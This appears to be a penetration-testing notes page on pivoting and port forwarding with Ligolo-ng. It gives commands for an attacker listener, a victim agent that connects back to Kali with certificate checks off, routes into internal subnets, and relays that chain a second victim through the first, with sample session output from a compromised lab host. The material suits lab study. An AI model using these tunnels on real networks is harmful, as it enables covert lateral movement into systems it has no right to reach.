Port Forwarding

Ligolo

Starting listener server

./proxy -laddr 192.168.146.158:5555 -selfcert

Connecting from victim back to kali

./agent -connect 192.168.45.223:11601 -ignore-cert

Creating a new interface

sudo ip tuntap add user $(whoami) mode tun ligolo2 ; sudo ip link set ligolo2 up

# Adding routes
sudo ip r add 10.4.216.0/24 dev ligolo2

Connecting to newly added connection

ligolo-ng Β» session
? Specify a session : 1 - #1 - CRAFT2\apache@CRAFT2 - 192.168.230.188:49785
[Agent : CRAFT2\apache@CRAFT2] Β» ifconfig
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 0                                   β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name         β”‚ Ethernet0 2                    β”‚
β”‚ Hardware MAC β”‚ 00:50:56:ab:d7:a7              β”‚
β”‚ MTU          β”‚ 1500                           β”‚
β”‚ Flags        β”‚ up|broadcast|multicast|running β”‚
β”‚ IPv4 Address β”‚ 192.168.230.188/24             β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 1                                  β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name         β”‚ Loopback Pseudo-Interface 1   β”‚
β”‚ Hardware MAC β”‚                               β”‚
β”‚ MTU          β”‚ -1                            β”‚
β”‚ Flags        β”‚ up|loopback|multicast|running β”‚
β”‚ IPv6 Address β”‚ ::1/128                       β”‚
β”‚ IPv4 Address β”‚ 127.0.0.1/8                   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
[Agent : CRAFT2\apache@CRAFT2] Β» start --tun craft2-pv
[Agent : CRAFT2\apache@CRAFT2] Β» INFO[0307] Starting tunnel to CRAFT2\apache@CRAFT2

Connecting to victim local server port

sudo ip tuntap add user $(whoami) mode tun craft2-pv ; sudo ip link set craft2-pv up
sudo ip r add 240.0.0.1/32 dev craft2-pv

Connecting to another multiple internal network

[Agent : confluence@confluence01] Β» listener_add --addr 0.0.0.0:8888 --to 192.168.45.223:8080  --tcp

anything connects to port 8080 on victim will connect back to us on port 8888

  • first victim listen on port 8888

  • redirect all received traffic to kali server port 8080

  • second victim connect to first victim on port 8888

  • traffic will be redirected back to kali server

agent.exe -connect 192.168.26.131:8888 -ignore-cert

https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b

https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683 https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel

PreviousPost CompromiseNextPlayground Setup

Last updated

Was this helpful?